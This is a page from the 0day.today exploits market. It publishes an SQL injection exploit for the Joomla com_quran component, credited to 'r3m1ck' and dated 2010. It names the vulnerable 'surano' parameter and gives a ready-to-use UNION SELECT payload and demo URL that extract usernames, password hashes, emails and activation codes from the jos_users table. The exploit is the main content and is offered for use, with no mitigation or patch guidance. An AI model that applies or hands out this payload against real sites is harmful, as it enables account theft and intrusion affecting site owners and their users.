[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla com_quran SQL Injection vulnerability

Author
r3m1ck
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12466
Category
web applications
Date add
30-05-2010
Platform
php
============================================
Joomla com_quran SQL Injection vulnerability
============================================


[!] ===========================================================================[!]
 
[~] Joomla com_quran SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Software download : http://muslimonline.org/forum/index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2
 
[!]===========================================================================[!]
 
 
 
[ Vulnerable File ]
 
http://site/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER]
 
[ XpL ]
 
-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--
 
or
 
another columns
 
[ d3m0 ]
 
http://site/joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--
 
etc etc etc ;]
 
[!]===========================================================================[!]



#  0day.today [2024-12-27]  #